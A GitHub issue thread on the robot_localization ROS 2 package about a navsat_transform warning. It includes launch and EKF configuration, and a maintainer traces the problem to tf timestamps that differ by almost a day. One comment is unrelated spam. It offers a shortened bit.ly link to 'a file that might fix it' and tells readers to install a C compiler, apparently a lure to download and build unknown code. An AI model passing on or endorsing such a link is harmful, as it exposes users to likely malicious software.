cra-ros-pkg/robot_localization #905: navsat_transform: "Could not obtain [map_frame] -> [base_link_frame] transform.. Will not remove offset of navsat device from robot's origin"

vlacorre, 2024-09-19:
Hi,

### **Desktop:**
 - OS: Ubuntu 22.04
 - ROS Distribution: ROS 2 Humble
 - `robot_localization` Package Version: 3.5.3

### **Description of the bug**
Sensor inputs:
- GNSS receiver: publishes NavSatFix on topic /ublox_gps_node/fix

Running nodes:
- my_odom_node: 
  - publishes odometry{parent: "**odom**", child: "**aft_mapped**"} on topic **/aft_mapped_to_init**
  - publishes transform{**odom** -> **aft_mapped**} on topic /tf
- navsat_transform_node: (configuration given below)
- ekf_node: (configuration given below)

**Launch configuration:**

```python
    # Grabs GNSS fix (and /odometry/global for redundancy) and publishes on /odometry/gps --> [frame_id = map | no child]
    gnss_fix_to_odometry_node = Node(
          package="robot_localization",
          executable="navsat_transform_node",
          name="navsat_transform",
          output="screen",
          parameters=[rl_params_file, {"use_sim_time": False}],
          remappings=[
              ("odometry/filtered", "odometry/global"), # IN
              ("gps/fix", "/ublox_gps_node/fix"),           # IN

              ("odometry/gps", "odometry/gps"),         # OUT
          ],
      )

    local_global_odometry_EKF_node = Node(
        package="robot_localization",
        executable="ekf_node",
        name="ekf_filter_node_map",
        parameters=[rl_params_file, {"use_sim_time": False}],
        remappings=[("odometry/filtered", "odometry/global")],
    )
```

```yaml
navsat_transform:
  ros__parameters:
    frequency: 30.0
    delay: 4.0 # Seconds to wait before calculating the transform from GPS coordinates to your robot’s world frame.

    zero_altitude: false
    yaw_offset: 0.0

    broadcast_utm_transform: false
    publish_filtered_gps: false

    wait_for_datum: true
    datum: [59.6099, 16.5448, 0.0] #  latitude, longitude, heading (in radians)
    # Note: A heading of 0 is toward the east, positive is counter-clockwise.

ekf_filter_node_map:
  ros__parameters:
    frequency: 30.0
    two_d_mode: false
    print_diagnostics: true
    debug: true
    publish_tf: true
    use_control: false

    map_frame: map
    odom_frame: odom # r3live publishes the odometry in the "world" frame instead of the "odom" frame

    world_frame: map

    base_link_frame: aft_mapped # r3live publishes the odometry of the "aft_mapped" frame on the topic "/aft_mapped_to_init"

    # Directly use roll, pitch and yaw 
    odom0: aft_mapped_to_init
    odom0_config: [false, false, false,
                  true,  true, true,
                  false, false, false,
                  false, false, false,
                  false, false, false]
    odom0_queue_size: 10
    odom0_differential: false
    odom0_relative: false

    # Differentiate X, Y and Z  to get linear velocities and avoid conflicts with the GNSS fix.
    odom1: aft_mapped_to_init
    odom1_config: [true, true, true,
                  false, false, false,
                  false, false, false,
                  false, false, false,
                  false, false, false]
    odom1_queue_size: 10
    odom1_differential: true
    odom1_relative: false

    # Fully use the GNSS fix
    odom2: odometry/gps
    odom2_config: [true,  true,  true,
                  false, false, false,
                  false, false, false,
                  false, false, false,
                  false, false, false]
    odom2_queue_size: 10
    odom2_differential: false
    odom2_relative: false

    process_noise_covariance: [1.0,   0.0,    0.0,    0.0,    0.0,    0.0,    0.0,     0.0,     0.0,    0.0,    0.0,    0.0,    0.0,    0.0,    0.0,
                              0.0,    1.0,    0.0,    0.0,    0.0,    0.0,    0.0,     0.0,     0.0,    0.0,    0.0,    0.0,    0.0,    0.0,    0.0,
                              0.0,    0.0,    1e-3,   0.0,    0.0,    0.0,    0.0,     0.0,     0.0,    0.0,    0.0,    0.0,    0.0,    0.0,    0.0,
                              0.0,    0.0,    0.0,    0.3,    0.0,    0.0,    0.0,     0.0,     0.0,    0.0,    0.0,    0.0,    0.0,    0.0,    0.0,
                              0.0,    0.0,    0.0,    0.0,    0.3,    0.0,    0.0,     0.0,     0.0,    0.0,    0.0,    0.0,    0.0,    0.0,    0.0,
                              0.0,    0.0,    0.0,    0.0,    0.0,    0.01,   0.0,     0.0,     0.0,    0.0,    0.0,    0.0,    0.0,    0.0,    0.0,
                              0.0,    0.0,    0.0,    0.0,    0.0,    0.0,    0.5,     0.0,     0.0,    0.0,    0.0,    0.0,    0.0,    0.0,    0.0,
                              0.0,    0.0,    0.0,    0.0,    0.0,    0.0,    0.0,     0.5,     0.0,    0.0,    0.0,    0.0,    0.0,    0.0,    0.0,
                              0.0,    0.0,    0.0,    0.0,    0.0,    0.0,    0.0,     0.0,     0.1,    0.0,    0.0,    0.0,    0.0,    0.0,    0.0,
                              0.0,    0.0,    0.0,    0.0,    0.0,    0.0,    0.0,     0.0,     0.0,    0.3,    0.0,    0.0,    0.0,    0.0,    0.0,
                              0.0,    0.0,    0.0,    0.0,    0.0,    0.0,    0.0,     0.0,     0.0,    0.0,    0.3,    0.0,    0.0,    0.0,    0.0,
                              0.0,    0.0,    0.0,    0.0,    0.0,    0.0,    0.0,     0.0,     0.0,    0.0,    0.0,    0.3,    0.0,    0.0,    0.0,
                              0.0,    0.0,    0.0,    0.0,    0.0,    0.0,    0.0,     0.0,     0.0,    0.0,    0.0,    0.0,    0.3,    0.0,    0.0,
                              0.0,    0.0,    0.0,    0.0,    0.0,    0.0,    0.0,     0.0,     0.0,    0.0,    0.0,    0.0,    0.0,    0.3,    0.0,
                              0.0,    0.0,    0.0,    0.0,    0.0,    0.0,    0.0,     0.0,     0.0,    0.0,    0.0,    0.0,    0.0,    0.0,    0.3]
```

**Expected behavior**
I

websquadpro, 2024-09-19:
This might help:This file might fix it
https://bit.ly/4evXrQ6
If you don't have the c compliator, install it.(gcc or clang)

ayrton04, 2024-09-19:
This looks like it should be a question before it's filed as an issue. Please ask over at robotics.stackexchange.com.

closed 2024-09-19 by ayrton04

vlacorre, 2024-09-19:
Hi @ayrton04,

Thank you for the reply. It looked like a bug to me because both transformed are being published, but the node still complains about a weird thing.

ayrton04, 2024-09-19:
It should definitely be a question. I'll give you what I expect is the answer here, but I'd appreciate it if you asked on robotics.stackexchange.com anyway, just so others can benefit.

Look at your `/tf` echo above, specifically the time stamps of the two transforms. One of them has a `sec` value of `1726663091`, and the other has a `sec` field of `1726740012`. Try entering those values into [this](https://www.epochconverter.com/), and you'll see that the two stamps differ by almost a day. The `tf` buffer isn't large enough to hold time stamps that old.

vlacorre, 2024-09-26:
Thank you for your quick answer, that solved the issue :)

I posted question + answer here: https://robotics.stackexchange.com/questions/113130/robot-localization-navsat-transform-node-will-not-remove-offset-of-navsat-de